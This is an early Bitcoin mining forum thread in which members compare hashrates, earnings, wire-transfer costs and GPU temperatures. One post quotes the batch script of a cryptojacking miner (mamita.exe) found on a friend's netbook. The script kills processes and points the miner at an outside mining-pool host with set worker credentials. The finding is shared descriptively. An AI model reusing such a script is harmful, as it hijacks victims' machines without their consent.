ZA Bitcoin Mining Pool

Difficulty just went up. It's now around a 3rd more difficult to mine a single Bitcoin.
Anyone running less that 1GH/s is going to find this rather frustrating. I'm now @ 1.2GH/s (6990 arrived early!!) and feel a little sad that I can only make around 0.88 BTC a day when on Monday I would have make 1.3 a day.

I haven't read the whole thread, but I can't really find anything concrete on the Internet either without spending too much time on researching it...

I'm curious:
Who exactly is funding the Bitcoin payouts, and is the Bitcoin mining being used for a good purpose (like Folding @ Home)?

The point of bitcoin is to mine for them. There is no good cause here apart from financial. You mine bitcoins that are worth 14-20 dollars. It's like a virtual mining world as far as i can tell.

As you mine them you can sell em, it's a virtual currency. There is no charity here only money but i am not sure how it works as i only have one bitcoin and i need about 3 or 4 before i will know if you can make money.

I've now came across a Bitcoin miner virus (mamita.exe), which I found on a friend of mine's netbook.

She asked me to do a virus scan on it, and MSE & Malwarebytes didn't detect it, but I saw that it was using 100% CPU usage. www.virustotal.com showed that only 9/43 applications detected it as a virus.
Ofcourse Malwarebytes' Anti-Malware did remove a few other malware. So I'm guessing that its not a virus by itself but rather just a real bitcoin miner that other virusses/malware install on PC's so that they can mine coins faster.

Update:
Here's the script that ran everything:
Code:
taskkill /f /im svchoost.exe
taskkill /f /im mamita.exe
mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2

Bitcoing mining virus on a netbook? Wonder how long that will take...then again if you create a virus and get it on 200 - 400 PC's you should pull in the coins pretty fast :o

Bitcoin prices should go up now.

Sitting on 18 coins at the moment. Wondering when I should cash them in

How many bitcoins do you have so far?

At the moment i got 16, just waiting to get 200 dollars worth so i can initiate a wire transfer, if that works i am hopefully going into business with a bitcoin buyer and then i will pay okes out here and then cash in there. Should know by monday.

Keep em for now kuga, although i will only be able offer 12 dollar 50 for them at the moment but i will pay out within 48 hours or less depending on the bank and the transfer fee won't cost anything. Wire transfer fees are a bitch, around 60-100 dollars depending on the bank.

Yusss you been raging hey Killa!

How did you mine so quick?

6990, 6970 and my work pc has a 5770. I just need 2 more bitcoin to get the wire transfer going but i will lose 50 dollars with that and whatever my greedy bank wants which could be another 40-50 dollars. That is why i want to setup a SA bitcoin exchange so we can exchange 100's of them and not a few because you lose plenty money with the wire transfer if it will even work.

run 24/7 as well.

Lol.

I think I've damaged my cards. There's red dots all over the screen when I watch series/movies and games are all blocky :(

Could be but perhaps one of them has a problem unrelated to running them so long. Hope so anyhow. What temp do they run at?

My 6970 is running at 66 the 6990 card run at 80-85 the one core is always much hotter. I run the fan at 80% when i am work haha, cannot sleep with it on at 80%
